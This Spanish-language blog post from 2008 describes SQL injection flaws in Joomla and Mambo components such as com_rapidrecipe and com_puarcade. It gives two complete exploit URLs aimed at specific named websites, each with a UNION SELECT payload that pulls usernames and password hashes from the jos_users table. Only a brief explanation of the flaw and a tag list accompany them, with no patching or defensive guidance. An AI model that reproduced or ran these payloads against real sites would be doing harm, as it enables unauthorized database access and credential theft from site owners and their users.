lunes, 29 de septiembre de 2008

SQLi en Joomla! y Mambo en componentes

Gran cantidad de sitios aun corren en internet con esta vulnerabilidad, la cual consiste en inyectar una consulta SQL diseñada especialmente para obtener datos de la BD de Joomla!

Veamos dos ejemplos:

URL:

http://www.cleator.co.za/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--






URL:

http://www.zohbetci.com/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--

Breve explicación:

Los componentes de Joomla y Mambo 'com_beamospetition',
'com_rapidrecipe', 'com_puarcade', etc... es un objeto de la vulnerabilidad SQLi (SQL inyection) porque falla en las validaciones de las consultas.
Explotando este error puede permitir a un atacante comprometer la aplicacion web, accesar o modificar datos o explotar vulnerabilidades que permanezcan latentes en la base de datos.
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)